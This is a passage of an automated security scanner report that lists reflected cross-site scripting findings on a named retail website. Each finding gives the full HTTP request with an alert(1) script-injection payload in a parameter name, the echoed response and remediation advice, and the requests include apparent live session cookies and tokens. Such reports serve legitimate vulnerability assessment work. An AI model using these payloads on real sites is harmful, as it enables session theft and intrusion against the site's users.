<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                       
...[SNIP]...
<!-- === Request Query String: 71d78--><script>alert(1)</script>e4fc885191d=1 -->
...[SNIP]...

1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /productAlerts/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dca1"-alert(1)-"291191fc800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productAlerts/index.jsp?5dca1"-alert(1)-"291191fc800=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36540


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                       
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="5dca1"-alert(1)-"291191fc800=1";
   </script>
...[SNIP]...

1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /reviews/submitReview.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7fe"-alert(1)-"d845562a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/submitReview.jsp?7a7fe"-alert(1)-"d845562a2b8=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37606


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="7a7fe"-alert(1)-"d845562a2b8=1";
   </script>
...[SNIP]...

1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /reviews/submitReview.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 758cb--><script>alert(1)</script>0cca78edec4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /reviews/submitReview.jsp?758cb--><script>alert(1)</script>0cca78edec4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:30 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37638


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
...[SNIP]...
<!-- === Request Query String: 758cb--><script>alert(1)</script>0cca78edec4=1 -->
...[SNIP]...

1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6ed87--><script>alert(1)</script>0129bd33332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shop/index.jsp?categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39101


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 -->
...[SNIP]...

1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccb6"-alert(1)-"478d101b660 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/index.jsp?categoryId=3719992&fccb6"-alert(1)-"478d101b660=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39053


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=3719992&fccb6"-alert(1)-"478d101b660=1";
   </script>
...[SNIP]...

1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /sitemap/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5759d--><script>alert(1)</script>be4ed9b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap/index.jsp?5759d--><script>alert(1)</script>be4ed9b675c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:32 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66217


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 5759d--><script>alert(1)</script>be4ed9b675c=1 -->
...[SNIP]...

1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /sitemap/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a297a"-alert(1)-"2de4c0c0fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap/index.jsp?a297a"-alert(1)-"2de4c0c0fc=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:31 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66183


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a297a"-alert(1)-"2de4c0c0fc=1";
   </script>
...[SNIP]...

1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f83"-alert(1)-"b1391c45b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storeLocator/index.jsp?b0f83"-alert(1)-"b1391c45b7e=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40351


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="b0f83"-alert(1)-"b1391c45b7e=1";
   </script>
...[SNIP]...

1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a988f--><script>alert(1)</script>da1042d0f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /storeLocator/index.jsp?a988f--><script>alert(1)</script>da1042d0f3d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40383


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: a988f--><script>alert(1)</script>da1042d0f3d=1 -->
...[SNIP]...

1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b99"-alert(1)-"9bd2d3d4d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.jsp?c7b99"-alert(1)-"9bd2d3d4d38=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:01 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38193


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="c7b99"-alert(1)-"9bd2d3d4d38=1";
   </script>
...[SNIP]...

1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da39a--><script>alert(1)</script>877791f5b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliate/index.jsp?da39a--><script>alert(1)</script>877791f5b35=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
